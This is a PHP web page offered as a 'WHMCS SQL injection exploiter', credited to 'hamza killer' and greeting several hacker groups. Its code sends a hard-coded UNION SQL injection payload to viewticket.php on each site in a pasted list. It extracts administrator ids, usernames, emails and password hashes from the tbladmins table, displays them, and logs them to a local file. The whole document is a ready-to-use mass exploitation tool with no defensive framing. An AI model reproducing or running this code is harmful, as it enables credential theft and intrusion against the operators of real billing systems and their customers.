whmcs sql injection exploiter by hamza killer

1. <center><a href="#" class="button"><font size="5" color="#A7CCCB"> whmcs sql injection exploiter by hamza killer</font></a> <br>
2. </font><br><br><br></center>
3.  
4. <center><form method="post">
5. <textarea cols="50" name="site" rows="20"> </textarea>
6. <br>
7. <input type="submit" name="go" value="exploit" />
8.  
9. </form>
10. </center>
11.  
12. <style>
13.  
14.  
15. .button {
16. background-color:#3399FF;
17. background-image: -moz-linear-gradient(center top , #3BA4C7 0%, #1982A5 100%);
18. border: 1px solid #004F72;
19. border-radius: 4px 4px 4px 4px;
20. box-shadow: 0 0 2px #BABABA, 0 0 1px #FFFFFF inset;
21. color: #E5FFFF;
22. font: bold 12px Tahoma,Helvetica,sans-serif;
23. padding: 30px;
24. text-align: center;
25. text-decoration: none;
26. }input[type="text"], input[type="password"], input[type="file"], select, textarea {
27. border: 1px solid #969696;
28. padding: 7px 12px;
29. }</style>
30. <style>
31.  
32. input[type="button"], input[type="reset"], input[type="submit"] {
33. border: 1px solid #000000;
34. cursor: pointer;
35. font-size: 11px;
36. margin-top: 2px;
37. padding: 8px 24px;
38. }
39. center {
40. text-align: -webkit-center;
41. }
42. body{
43.  
44. /* font-family : Verdana; */
45. color : #990000;
46. font-size : 14px;
47. font-family:tahoma;
48. background-color: ;
49. background-image: url('http://i.imgur.com/zHNCk2e.gif')
50. color: #990000;
51. font: 9pt Lucida,Verdana;
52. margin: 0;
53. vertical-align: top;
54. color: #e1e1e1;
55.  
56.  
57. }
58.  
59. </style>
60. <center>
61. <?
62. /*
63.  
64. to b0x
65. */
66. set_time_limit(0);
67. error_reporting(0);
68. @apache_setenv('no-gzip', 1);
69. @ini_set('zlib.output_compression', 0);
70. @ini_set('implicit_flush', 1);
71. for($i=0;$i<= ob_get_level(); $i++)
72. {
73. ob_end_flush();
74. }
75. ob_implicit_flush(1);
76. $fp=fopen("hamza.txt","a+");
77. $post = "tid[sqltype]=TABLEJOIN&tid[value]=-1 union select 1,0,0,0,0,0,0,0,0,0,0,(SELECT GROUP_CONCAT(0x3a3a3a3a3a,id,0x3a,username,0x3a,email,0x3a,password,0x3a3a3a3a3a) FROM tbladmins),0,0,0,0,0,0,0,0,0,0,0#";
78.  
79. if($_POST['go'])
80. {
81. $sites=explode("\n",$_POST['site']);
82. foreach($sites as $si)
83. {
84. $site=trim($si);
85. $url = "$site/viewticket.php";
86. $sh = curl_init($url);
87. curl_setopt($sh, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)");
88. curl_setopt($sh, CURLOPT_RETURNTRANSFER, true);
89. curl_setopt($sh, CURLOPT_SSL_VERIFYPEER, false);
90. curl_setopt($sh, CURLOPT_FOLLOWLOCATION, 1);
91. curl_setopt($sh, CURLOPT_POSTFIELDS,$post);
92. $ex = curl_exec($sh);
93. $sa=preg_match_all("/:::::(.*?):::::/s",$ex,$dat);
94. if($sa){
95.  
96. echo"<center><font color='#006600' size='3'>succeed<br>--------------------------------------<br>$url<br>--------------------------------------</font>";
97. foreach($dat[1] as $data)
98. {
99. echo"<br><center><font color='#006600' size='3'><br>$data<br></font><center>";
100. @fwrite($fp,"\n\n-------$url----\n$data\n\n-------");
101. }
102.  
103. }else{
104. echo"<br><center><font size='2' color='#990000'> $url => faild</font><br><br><br><center>";
105. }
106.  
107. }
108. @fclose($fp);
109. }
110.  
111.  
112.  
113.  
114.  
115.  
116.  
117. ?>
118. to :<font color="#3366FF">linux-dz</font> -<font color="#3366FF">virus duba</font>- <font color="#3366FF">Lapoca DZ</font></font></font></p></form></body>